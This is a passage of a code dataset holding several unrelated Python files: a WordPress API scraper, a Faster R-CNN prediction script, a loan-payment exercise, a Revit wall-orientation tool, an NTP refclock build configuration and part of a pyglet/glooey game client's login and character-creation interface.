bad response.')\r\n return False\r\n\r\n\r\ndef get_api_results(url, query):\r\n \"\"\" Collects articles from a WordPress site via the API.\r\n \"\"\"\r\n\r\n log = getLogger(__name__)\r\n chomp_urls = []\r\n\r\n url = url.rstrip('/')\r\n log.info('Querying \"%s\" using WordPress API at: %s', query, url)\r\n if not is_wordpress_url(url):\r\n log.info('WordPress API not found, moving on.')\r\n return None\r\n\r\n # Build the query urls.\r\n query = query.replace(' ', '+')\r\n chomp_urls.append(WP_API_URL + WP_PAGES_URL.format(query=query))\r\n chomp_urls.append(WP_API_URL + WP_POSTS_URL.format(query=query))\r\n\r\n # Do scrape.\r\n for chomp_url in chomp_urls:\r\n for response in browser.get_json_from_url(chomp_url):\r\n \r\n log.debug('Collecting: %s', response['link'])\r\n\r\n yield dict(\r\n slug=response['slug'],\r\n date=clean.from_datetime_str(response['date']),\r\n title=clean.from_html(response['title']['rendered']),\r\n url=response['link'],\r\n search_url=chomp_url,\r\n content=clean.from_html(response['content']['rendered'])\r\n )\r\n\r\n log.info('Finished query \"%s\" using WordPress API at: %s', query, url)\r\n","sub_path":"wordpress.py","file_name":"wordpress.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447014398","text":"import os\nimport argparse\nimport pandas as pd\nimport torch\nfrom PIL import Image\nimport torchvision.transforms as T\nfrom torchvision.ops.boxes import box_convert\nfrom netcode.net import custom_fasterrcnn_resnet50_fpn\n\n# Parsing script arguments\nparser = argparse.ArgumentParser(description='Process input')\nparser.add_argument('input_folder', type=str, help='Input folder path, containing images')\nargs = parser.parse_args()\n\n# Reading input folder\nfiles = os.listdir(args.input_folder)\n\n#####\nbbox_pred = []\nproper_mask_pred = []\n\n# Setting up device\ndevice = torch.device('cuda') if torch.cuda.is_available() else 
torch.device('cpu')\nprint(f'Predicting on {device}')\n\n# Setting up the model\nmodel = custom_fasterrcnn_resnet50_fpn()\nmodel.load_state_dict(torch.load('model_epoch_2_loss_0.134.pt', map_location=device)[\"model_state\"])\nmodel = model.to(device)\n\nmodel.eval()\nfor file_name in files:\n img = Image.open(os.path.join(args.input_folder, file_name)).convert('RGB')\n img = [T.ToTensor()(img)]\n _, prediction = model(img)\n\n bbox_xyxy = prediction[0]['boxes'][0].unsqueeze(0)\n bbox = box_convert(bbox_xyxy, in_fmt='xyxy', out_fmt='xywh')\n proper_mask = prediction[0]['labels'][0].item()\n\n bbox_pred.append(bbox)\n proper_mask_pred.append(proper_mask)\n\nprediction_df = pd.DataFrame(zip(files, *bbox_pred, proper_mask_pred),\n columns=['filename', 'x', 'y', 'w', 'h', 'proper_mask'])\nprediction_df.to_csv(\"prediction.csv\", index=False, header=True)\n","sub_path":"netcode/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497100843","text":"balance = 320000\r\nannualInterestRate = 0.2\r\n\r\n\r\n\r\n\r\n\r\n\r\nmonthlyInterestRate = annualInterestRate / 12.0\r\nminimumFixedMonthlyPaymentBound = balance/12.0\r\nmaximumFixedMonthlyPaymentBound = (balance * (1 + monthlyInterestRate)**12) / 12.0\r\noldBalance = balance\r\nminimumFixedMonthlyPayment = 0.015\r\nwhile balance >= 0.01 or balance <= -0.01: \r\n balance = oldBalance\r\n minimumFixedMonthlyPayment = (minimumFixedMonthlyPaymentBound + maximumFixedMonthlyPaymentBound) / 2\r\n for i in range(12):\r\n balance = (balance - minimumFixedMonthlyPayment) * (1 + monthlyInterestRate)\r\n if balance < 0:\r\n maximumFixedMonthlyPaymentBound = minimumFixedMonthlyPayment \r\n else:\r\n minimumFixedMonthlyPaymentBound = minimumFixedMonthlyPayment\r\n\r\n\r\nprint(\"Lowest Payment:\", round(minimumFixedMonthlyPayment, 
2))\r\n\r\n","sub_path":"ProblemSet2_Problem3.py","file_name":"ProblemSet2_Problem3.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629788534","text":"\"\"\"Inscribe en el parametro \"ORIENTACION\" la orientacion de la normal de los muros\"\"\"\r\n\r\n__title__ = 'Orientacion\\nde Muros'\r\n__author__ = 'Carlos Romero'\r\n\r\n#for timing\r\nfrom pyrevit.coreutils import Timer\r\ntimer = Timer()\r\n\r\nfrom Autodesk.Revit.DB import Transaction, FilteredElementCollector, BuiltInCategory\r\nimport Autodesk.Revit.DB as DB\r\nimport clr\r\n\r\ndoc = __revit__.ActiveUIDocument.Document\r\nuidoc = __revit__.ActiveUIDocument\r\n\r\nwalls = DB.FilteredElementCollector(doc).OfCategory(BuiltInCategory.OST_Walls).WhereElementIsNotElementType().ToElements()\r\nnew_walls = []\r\nori_x = []\r\nori_y = []\r\nprint(\"Muros en el modelo: \" + str(len(walls)))\r\nfor wall in walls:\r\n\ttry:\r\n\t\tori_x.append( round( wall.Orientation.Normalize().X , 4))\r\n\t\tori_y.append( round( wall.Orientation.Normalize().Y , 4))\r\n\t\tnew_walls.append(wall)\r\n\texcept:\r\n\t\tprint(\"No ha podido sacar la orientacion de uno de los muros.\")\r\n\t\t\r\nprint(\"Muros con orientacion: \" + str(len(new_walls)))\r\ndef ori (x, y):\r\n\tif x <= 0.3826 and x >= -0.3826 and y <= 1 and y >= 0.9238:\r\n\t\treturn \"North\"\r\n\telif x < 0.8660 and x > 0.3826 and y < 0.9238 and y > 0.5000:\r\n\t\treturn \"Northeast\"\r\n\telif x <= 1 and x >= 0.8660 and y <= 0.5000 and y >= -0.3583:\r\n\t\treturn \"East\"\r\n\telif x < 0.9335 and x > 0.3090 and y < -0.3583 and y > -0.9510:\r\n\t\treturn \"Southeast\"\r\n\telif x <= 0.3090 and x >= -0.3090 and y <= -0.9510 and y >= -1:\r\n\t\treturn \"South\"\r\n\telif x < -0.3090 and x > -0.9335 and y < -0.3583 and y > -0.9510:\r\n\t\treturn \"Southwest\"\t\r\n\telif x <= -0.8660 and x >= -1 and y <= 0.5000 and y >= -0.3583:\r\n\t\treturn \"West\"\r\n\telif x < -0.3826 
and x > -0.8660 and y < 0.9238 and y > 0.5000:\r\n\t\treturn \"Northwest\"\r\n\telse:\r\n\t\treturn \"Sin orientacion\"\r\nres = []\r\nfor x, y in zip (ori_x,ori_y):\r\n\tres.append(ori(x,y))\r\n\t\r\nt = Transaction(doc, \"Orientacion Muros\")\r\nt.Start()\r\n\r\nfor wall, dir in zip(new_walls,res):\r\n\tif wall.LookupParameter(\"Orientacion\"):\r\n\t\ttry:\r\n\t\t\twall.LookupParameter(\"Orientacion\").Set(dir)\r\n\t\texcept:\r\n\t\t\tprint(\"No se puede escribir en el parametro de uno de los muros.\")\r\n\t\r\n\t\r\nt.Commit()\r\n\r\n\r\n#for timing\r\nendtime =\"He tardado: \" + str(timer.get_time()) + \" segundos.\"\r\nprint(endtime)\r\n","sub_path":"orientacion_script.py","file_name":"orientacion_script.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300274107","text":"from waflib.Configure import conf\nfrom waflib.Logs import pprint\n\n# Note: When you change this list. also check the following files:\n# doc/recflock.txt\n# include/ntp.h\n# libntp/clocktypes.c\n# ntpd/refclock_conf.c\n\nrefclock_map = {\n\n\t1: {\n\t\t\"descr\":\t\"Undisciplined Local Clock\",\n\t\t\"define\":\t\"CLOCK_LOCAL\",\n\t\t\"file\":\t\t\"local\"\n\t},\n\n\t4: {\n\t\t\"descr\":\t\"Spectracom WWVB/GPS Receivers\",\n\t\t\"define\":\t\"CLOCK_SPECTRACOM\",\n\t\t\"file\":\t\t\"spectracom\"\n\t},\n\n\t5: {\n\t\t\"descr\":\t\"TrueTime GPS/GOES/OMEGA Receivers\",\n\t\t\"define\":\t\"CLOCK_TRUETIME\",\n\t\t\"file\":\t\t\"true\"\n\t},\n\n\t6: {\n\t\t\"descr\":\t\"IRIG Audio Decoder\",\n\t\t\"define\":\t\"CLOCK_IRIG\",\n\t\t\"require\":\t[\"audio\"],\n\t\t\"file\":\t\t\"irig\"\n\t},\n\n\t7: {\n\t\t\"descr\":\t\"Radio CHU Audio Demodulator/Decoder\",\n\t\t\"define\":\t\"CLOCK_CHU\",\n\t\t\"require\":\t[\"audio\"],\n\t\t\"file\":\t\t\"chu\"\n\t},\n\n\t8: {\n\t\t\"descr\":\t\"Generic Reference Driver 
(Parse)\",\n\t\t\"define\":\t\"CLOCK_PARSE\",\n\t\t\"require\":\t[\"parse\"],\n\t\t\"file\":\t\t\"parse\"\n\t},\n\n\t9: {\n\t\t\"descr\":\t\"Magnavox MX4200 GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_MX4200\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"mx4200\"\n\t},\n\n\t10: {\n\t\t\"descr\":\t\"Austron 2200A/2201A GPS Receivers\",\n\t\t\"define\":\t\"CLOCK_AS2201\",\n\t\t\"file\":\t\t\"as2201\"\n\t},\n\n\t11: {\n\t\t\"descr\":\t\"Arbiter 1088A/B GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_ARBITER\",\n\t\t\"file\":\t\t\"arbiter\"\n\t},\n\n\t18: {\n\t\t\"descr\":\t\"NIST/USNO/PTB Modem Time Services\",\n\t\t\"define\":\t\"CLOCK_ACTS\",\n\t\t\"file\":\t\t\"acts\"\n\t},\n\n\t20: {\n\t\t\"descr\":\t\"Generic NMEA GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_NMEA\",\n\t\t\"file\":\t\t\"nmea\"\n\t},\n\n\t22: {\n\t\t\"descr\":\t\"PPS Clock Discipline\",\n\t\t\"define\":\t\"CLOCK_ATOM\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"atom\"\n\t},\n\n\t26: {\n\t\t\"descr\":\t\"Hewlett Packard 58503A GPS Receiver\",\n\t\t\"define\":\t\"CLOCK_HPGPS\",\n\t\t\"file\":\t\t\"hpgps\"\n\t},\n\n\t27: {\n\t\t\"descr\":\t\"Arcron MSF Receiver\",\n\t\t\"define\":\t\"CLOCK_ARCRON_MSF\",\n\t\t\"file\":\t\t\"arc\"\n\t},\n\n\t28: {\n\t\t\"descr\":\t\"Shared Memory Driver\",\n\t\t\"define\":\t\"CLOCK_SHM\",\n\t\t\"file\":\t\t\"shm\"\n\t},\n\n\t29: {\n\t\t\"descr\":\t\"Trimble Navigation Palisade GPS\",\n\t\t\"define\":\t\"CLOCK_PALISADE\",\n\t\t\"file\":\t\t\"palisade\"\n\t},\n\n\t30: {\n\t\t\"descr\":\t\"Motorola UT Oncore GPS\",\n\t\t\"define\":\t\"CLOCK_ONCORE\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"oncore\"\n\t},\n\n\t31: {\n\t\t\"descr\":\t\"Rockwell Jupiter GPS\",\n\t\t\"define\":\t\"CLOCK_JUPITER\",\n\t\t\"require\":\t[\"ppsapi\"],\n\t\t\"file\":\t\t\"jupiter\"\n\t},\n\n\t33: {\n\t\t\"descr\":\t\"Dumb Clock\",\n\t\t\"define\":\t\"CLOCK_DUMBCLOCK\",\n\t\t\"file\":\t\t\"dumbclock\"\n\t},\n\n\t35: {\n\t\t\"descr\":\t\"Conrad Parallel Port Radio 
Clock\",\n\t\t\"define\":\t\"CLOCK_PCF\",\n\t\t\"file\":\t\t\"pcf\"\n\t},\n\n\t38: {\n\t\t\"descr\":\t\"hopf GPS/DCF77 6021/komp for Serial Line\",\n\t\t\"define\":\t\"CLOCK_HOPF_SERIAL\",\n\t\t\"file\":\t\t\"hopfser\"\n\t},\n\n\t39: {\n\t\t\"descr\":\t\"hopf GPS/DCF77 6039 for PCI-Bus\",\n\t\t\"define\":\t\"CLOCK_HOPF_PCI\",\n\t\t\"file\":\t\t\"hopfpci\"\n\t},\n\n\t40: {\n\t\t\"descr\":\t\"JJY Receivers\",\n\t\t\"define\":\t\"CLOCK_JJY\",\n\t\t\"file\":\t\t\"jjy\"\n\t},\n\n\t42: {\n\t\t\"descr\":\t\"Zyfer GPStarplus Receiver\",\n\t\t\"define\":\t\"CLOCK_ZYFER\",\n\t\t\"file\":\t\t\"zyfer\"\n\t},\n\n\t44: {\n\t\t\"descr\":\t\"NeoClock4X - DCF77 / TDF serial line\",\n\t\t\"define\":\t\"CLOCK_NEOCLOCK4X\",\n\t\t\"file\":\t\t\"neoclock4x\"\n\t},\n\n\t45: {\n\t\t\"descr\":\t\"Spectracom TSYNC\",\n\t\t\"define\":\t\"CLOCK_TSYNCPCI\",\n\t\t\"file\":\t\t\"tsyncpci\"\n\t},\n\n\t46: {\n\t\t\"descr\":\t\"GPSD NG client protocol\",\n\t\t\"define\":\t\"CLOCK_GPSDJSON\",\n\t\t\"file\":\t\t\"gpsdjson\"\n\t}\n}\n\n\n\n@conf\ndef refclock_config(ctx):\n\tfrom refclock import refclock_map\n\n\tif ctx.options.refclocks == \"all\":\n\t\tids = refclock_map.keys()\n\telse:\n\t\t# XXX: better error checking\n\t\tids = ctx.options.refclocks.split(\",\")\n\n\tctx.env.REFCLOCK_DEFINES = []\n\tctx.env.REFCLOCK_SOURCE = []\n\n\t# Remove duplicate IDs while preserving order.\n\tunique_id = []\n\t[unique_id.append(x) for x in ids if x not in unique_id]\n\n\n\trefclock = False\n\tfor id in unique_id:\n\t\ttry:\n\t\t\tid = int(id)\n\t\texcept ValueError:\n\t\t\tctx.fatal(\"'%s' is not an integer.\" % id)\n\n\t\tif id not in refclock_map:\n\t\t\tctx.fatal(\"'%s' is not a valid Refclock ID\" % id)\n\n\t\trc = refclock_map[id]\n\n\t\tif rc['define'] == \"CLOCK_PARSE\":\n\t\t\tparse_clocks = 
(\n\t\t\t\t\"CLOCK_COMPUTIME\",\n\t\t\t\t\"CLOCK_DCF7000\",\n\t\t\t\t\"CLOCK_HOPF6021\",\n\t\t\t\t\"CLOCK_MEINBERG\",\n\t\t\t\t\"CLOCK_RAWDCF\",\n\t\t\t\t\"CLOCK_RCC8000\",\n\t\t\t\t\"CLOCK_SCHMID\",\n\t\t\t\t\"CLOCK_SEL240X\",\n\t\t\t\t\"CLOCK_TRIMTAIP\",\n\t\t\t\t\"CLOCK_TRIMTSIP\",\n\t\t\t\t\"CLOCK_VARITEXT\",\n\t\t\t\t\"CLOCK_WHARTON_400A\",\n\t\t\t\t)\n\t\t\tfor subtype in parse_clocks:\n\t\t\t\tctx.define(subtype, 1, comment=\"Enable individual parse clock\")\n\n\t\tctx.start_msg(\"Enabling Refclock %s (%d):\" % (rc[\"descr\"], id))\n\n\t\tif \"require\" in rc:\n\t\t\tif \"ppsapi\" in rc[\"require\"]:\n\t\t\t\tif not ctx.get_define(\"HAVE_PPSAPI\"):\n\t\t\t\t\tctx.end_msg(\"No\")\n\t\t\t\t\tpprint(\"RED\", \"Refclock \\\"%s\\\" disabled, PPS API has not been detected as working.\" % rc[\"descr\"])\n\t\t\t\t\tcontinue\n\n\t\t\tif \"audio\" in rc[\"require\"]:\n\t\t\t\tif not ctx.env.AUDIO_ENABLE:\n\t\t\t\t\tctx.end_msg(\"No\")\n\t\t\t\t\tpprint(\"RED\", \"Refclock \\\"%s\\\" disabled, Audio (OSS) support is not available.\" % rc[\"descr\"])\n\t\t\t\t\tcontinue\n\n\n\t\tctx.env.REFCLOCK_SOURCE.append((rc[\"file\"], rc[\"define\"]))\n\t\tctx.env[\"REFCLOCK_%s\" % rc[\"file\"].upper()] = True\n\t\tctx.define(rc[\"define\"], 1, comment=\"Enable '%s' refclock\" % rc[\"descr\"])\n\t\tctx.env.REFCLOCK_LIST += [str(id)]\n\n\t\tctx.end_msg(\"Yes\")\n\n\t\trefclock = True\n\n\tif refclock:\n\t\tctx.env.REFCLOCK_ENABLE = True\n\t\tctx.define(\"REFCLOCK\", 1, comment=\"Enable refclock support\")\n","sub_path":"pylib/refclock.py","file_name":"refclock.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414316997","text":"#!/usr/bin/env python3\n\nimport argparse\nimport jsonpickle\nimport json\nimport math\nimport os\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport pyglet\nimport glooey\nfrom pyglet.window import key as KEY\nfrom pyglet import clock\nfrom 
src.passhash import hashPassword\nfrom src.character import Character\n\n# load the tileset TODO: support different tilesets.\npyglet.resource.path = [\n \"tilesets/Chesthole32/tiles\",\n \"tilesets/Chesthole32/tiles/background\",\n \"tilesets/Chesthole32/tiles/monsters\",\n \"tilesets/Chesthole32/tiles/terrain\",\n]\nfor folder in [\n \"/gfx/\",\n \"gfx/inputbox\",\n \"gfx/background\",\n \"gfx/scrollbox/vbar/backward\",\n \"gfx/scrollbox/vbar/forward\",\n \"gfx/scrollbox/vbar/decoration\",\n \"gfx/scrollbox/vbar/grip\",\n \"gfx/scrollbox/frame/decoration\",\n]:\n pyglet.resource.path.append(folder)\n print(\"Loaded gfx folder\", folder)\npyglet.resource.reindex()\n\nfrom Mastermind._mm_client import MastermindClientTCP\n\nfrom src.action import Action\nfrom src.blueprint import Blueprint\nfrom src.command import Command\nfrom src.item import Item, ItemManager\nfrom src.character import Character\nfrom src.position import Position\nfrom src.recipe import Recipe, RecipeManager\nfrom src.tileManager import TileManager\nfrom src.worldmap import Worldmap\n\n\nclass CustomBackground(glooey.Background):\n custom_center = pyglet.resource.texture(\"center.png\")\n custom_top = pyglet.resource.texture(\"top.png\")\n custom_bottom = pyglet.resource.texture(\"bottom.png\")\n custom_left = pyglet.resource.texture(\"left.png\")\n custom_right = pyglet.resource.texture(\"right.png\")\n custom_top_left = pyglet.resource.image(\"top_left.png\")\n custom_top_right = pyglet.resource.image(\"top_right.png\")\n custom_bottom_left = pyglet.resource.image(\"bottom_left.png\")\n custom_bottom_right = pyglet.resource.image(\"bottom_right.png\")\n\n\nclass InputBox(glooey.Form):\n custom_alignment = \"center\"\n custom_height_hint = 12\n\n class Label(glooey.EditableLabel):\n custom_font_size = 10\n custom_color = \"#b9ad86\"\n custom_alignment = \"center\"\n custom_horz_padding = 4\n custom_top_padding = 2\n custom_width_hint = 200\n custom_height_hint = 12\n # TODO: import string; def 
format_alpha(entered_string): return \"\".join(char for char in entered_string if char in string.ascii_letters) # only allow valid non-space asicii\n\n class Base(glooey.Background):\n custom_center = pyglet.resource.texture(\"form_center.png\")\n custom_left = pyglet.resource.image(\"form_left.png\")\n custom_right = pyglet.resource.image(\"form_right.png\")\n\n\nclass CharacterGenerationInputBox(glooey.Form):\n custom_alignment = \"center\"\n custom_height_hint = 12\n\n class Label(glooey.EditableLabel):\n custom_font_size = 12\n custom_color = \"#b9ad86\"\n custom_alignment = \"center\"\n custom_horz_padding = 4\n custom_top_padding = 2\n custom_width_hint = 200\n custom_height_hint = 12\n # TODO: import string; def format_alpha(entered_string): return \"\".join(char for char in entered_string if char in string.ascii_letters) # only allow valid non-space asicii\n\n class Base(glooey.Background):\n custom_center = pyglet.resource.texture(\"form_center.png\")\n custom_left = pyglet.resource.image(\"form_left.png\")\n custom_right = pyglet.resource.image(\"form_right.png\")\n\n\nclass CustomScrollBox(glooey.ScrollBox):\n # custom_alignment = 'center'\n custom_size_hint = 300, 200\n custom_height_hint = 200\n\n class Frame(glooey.Frame):\n class Decoration(glooey.Background):\n custom_center = pyglet.resource.texture(\"scrollbox_center.png\")\n\n class Box(glooey.Bin):\n custom_horz_padding = 2\n\n class VBar(glooey.VScrollBar):\n class Decoration(glooey.Background):\n custom_top = pyglet.resource.image(\"bar_top.png\")\n custom_center = pyglet.resource.texture(\"bar_vert.png\")\n custom_bottom = pyglet.resource.image(\"bar_bottom.png\")\n\n class Forward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_down.png\")\n\n class 
Backward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_down.png\")\n\n class Grip(glooey.ButtonScrollGrip):\n class Base(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_base.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_base.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_base.png\")\n\n class Over(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_over.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_over.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_over.png\")\n\n class Down(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_down.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_down.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_down.png\")\n\n\nclass CharacterGenerationScrollBox(glooey.ScrollBox):\n custom_alignment = \"center\"\n custom_size_hint = 200, 300\n custom_height_hint = 200\n\n class Frame(glooey.Frame):\n class Decoration(glooey.Background):\n custom_center = pyglet.resource.texture(\"scrollbox_center.png\")\n\n class Box(glooey.Bin):\n custom_horz_padding = 2\n\n class VBar(glooey.VScrollBar):\n class Decoration(glooey.Background):\n custom_top = pyglet.resource.image(\"bar_top.png\")\n custom_center = pyglet.resource.texture(\"bar_vert.png\")\n custom_bottom = pyglet.resource.image(\"bar_bottom.png\")\n\n class Forward(glooey.Button):\n class Base(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"forward_down.png\")\n\n class Backward(glooey.Button):\n class Base(glooey.Image):\n custom_image = 
pyglet.resource.image(\"backward_base.png\")\n\n class Over(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_over.png\")\n\n class Down(glooey.Image):\n custom_image = pyglet.resource.image(\"backward_down.png\")\n\n class Grip(glooey.ButtonScrollGrip):\n class Base(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_base.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_base.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_base.png\")\n\n class Over(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_over.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_over.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_over.png\")\n\n class Down(glooey.Background):\n custom_top = pyglet.resource.image(\"grip_top_down.png\")\n custom_center = pyglet.resource.texture(\"grip_vert_down.png\")\n custom_bottom = pyglet.resource.image(\"grip_bottom_down.png\")\n\n\nclass ConnectButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 14\n\n Label = MyLabel\n # custom_alignment = 'fill'\n # custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\nclass CharacterListButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 14\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\nclass CreateNewCharacterButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 14\n\n Label 
= MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self):\n super().__init__(\"Create a Character\")\n\n\nclass CharacterGenButton(glooey.Button):\n custom_padding = 8\n\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 12\n custom_padding = 2\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#204a87\"\n\n class Over(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\nclass ServerListButton(glooey.Button):\n class MyLabel(glooey.Label):\n custom_color = \"#babdb6\"\n custom_font_size = 12\n\n Label = MyLabel\n # custom_alignment = 'fill'\n custom_height_hint = 12\n\n class Base(glooey.Background):\n custom_color = \"#3465a4\"\n\n class Over(glooey.Background):\n custom_color = \"#204a87\"\n\n class Down(glooey.Background):\n custom_color = \"#729fcf\"\n\n def __init__(self, text):\n super().__init__(text)\n\n\n# the first Window the user sees.\nclass LoginWindow(glooey.containers.VBox):\n def __init__(self):\n super().__init__()\n\n self.username = InputBox()\n self.password = InputBox()\n\n self.password.push_handlers(\n on_unfocus=lambda w: print(f\"password: ***************\")\n )\n\n self.serverIP = InputBox()\n self.serverPort = InputBox()\n self.serverIP.push_handlers(on_unfocus=lambda w: print(f\"serverIP: '{w.text}'\"))\n self.serverPort.push_handlers(\n on_unfocus=lambda w: print(f\"serverPort: '{w.text}'\")\n )\n\n self.grid = glooey.Grid(0, 0, 0, 0)\n self.padding = 16\n\n self.titleLabel = glooey.Label(\"Cataclysm: Looming Darkness\")\n\n self.grid[0, 1] = self.titleLabel\n\n self.grid[1, 0] = 
glooey.Label(\"Username:\")\n\n self.grid[1, 1] = self.username\n self.grid[3, 0] = glooey.Label(\"password:\")\n self.grid[3, 1] = self.password\n self.grid[4, 0] = glooey.Label(\"Server IP:\")\n self.grid[4, 1] = self.serverIP\n self.grid[5, 0] = glooey.Label(\"Server Port:\")\n self.grid[5, 1] = self.serverPort\n\n with open(\"client.json\") as f:\n client_data = json.load(f)\n\n self.username.text = client_data[\"username\"]\n self.password.text = client_data[\"password\"]\n self.serverList = client_data[\"serverList\"]\n\n connectButton = ConnectButton(\"Connect\")\n self.grid[6, 1] = connectButton\n\n serverListScrollBox = CustomScrollBox()\n serverListScrollBox.size_hint = 100, 100\n vbox_for_serverlist = glooey.VBox(0)\n for server in self.serverList:\n _button = ServerListButton(server)\n # sets the active server to the one you press.\n _button.push_handlers(on_click=self.set_host_and_port_InputBoxes)\n vbox_for_serverlist.add(_button)\n serverListScrollBox.add(vbox_for_serverlist)\n self.grid[6, 0] = serverListScrollBox\n\n self.add(self.grid)\n\n # self.grid.debug_drawing_problems()\n # self.grid.debug_placement_problems()\n\n def set_host_and_port_InputBoxes(self, server_and_port):\n self.serverIP.text = server_and_port.text.split(\":\")[0]\n self.serverPort.text = server_and_port.text.split(\":\")[1]\n\n\n# The window that let's the user select a character or leads to a Window where you can generate a new one.\nclass CharacterSelectWindow(glooey.containers.VBox):\n def __init__(self, list_of_characters):\n super().__init__()\n\n self.grid = glooey.Grid(0, 0, 0, 0)\n self.grid.padding = 16\n\n self.titleLabel = glooey.Label(\"Please Select or Create a Character.\")\n\n self.grid[0, 1] = self.titleLabel\n\n self.add(self.grid)\n\n self.fill_character_list(list_of_characters)\n\n def fill_character_list(self, list_of_characters):\n characterListScrollBox = CustomScrollBox()\n characterListScrollBox.size_hint = 100, 100\n self.vbox_for_characterlist = 
glooey.VBox(0)\n # add the create new character button first then add the list the of characters for the user.\n self.create_button = CreateNewCharacterButton()\n\n # add the first button\n self.vbox_for_characterlist.add(self.create_button)\n # add the character buttons\n for character in list_of_characters:\n print(character)\n _decoded = jsonpickle.decode(character, keys=True)\n _button = CharacterListButton(_decoded[\"name\"])\n _button.push_handlers(on_click=self.select_character)\n self.vbox_for_characterlist.add(_button)\n\n characterListScrollBox.add(self.vbox_for_characterlist)\n self.grid[2, 0] = characterListScrollBox\n\n def select_character(self, dt):\n # need to setup the MainWindow and show it.\n pass\n\n\nclass CharacterGenerationWindow(glooey.containers.VBox):\n custom_padding = 16\n # minimum size\n custom_default_cell_size = 2\n # has 6 unchanging buttons on top which control which screen the player is on for genning\n # screens are 'scenario', 'profession', 'traits', 'stats', 'skills', 'description'\n def __init__(self):\n super().__init__()\n\n # our points available to spend on traits\n self.points = 8\n \n\n _screens = [\n \"scenario\",\n \"profession\",\n \"traits\",\n \"stats\",\n \"skills\",\n \"description\",\n ]\n\n # the row of buttons on top. responsible for switching the subcontext below points left.\n top_buttons = glooey.HBox(0)\n\n # finish_button is self. 
    class descriptionTab(glooey.containers.Grid):
        """Grid laying out the 'description' tab of character generation.

        Layout (see the comment sketch below):
            row 0: name label/input, gender label/input
            row 1: profession and scenario labels (read-only defaults)
            row 2: column headers for stats / traits / skills
            row 3: scroll boxes listing stats / traits / skills
        """

        def __init__(self):
            # Grid(0, 0, 0, 0): presumably lets glooey autosize rows/cols —
            # matches the other Grid(0, 0, 0, 0) uses in this file; confirm
            # against glooey's Grid docs.
            super().__init__(0, 0, 0, 0)

            self[0, 0] = glooey.Label("Name:")
            self[0, 1] = CharacterGenerationInputBox()
            self[0, 2] = glooey.Label("Gender:")
            self[0, 3] = CharacterGenerationInputBox()
            self[1, 0] = glooey.Label("Profession:")
            self[1, 1] = glooey.Label("Default")
            self[1, 2] = glooey.Label("Scenario:")
            self[1, 3] = glooey.Label("Evacuee")
            self[2, 0] = glooey.Label("Stats:")
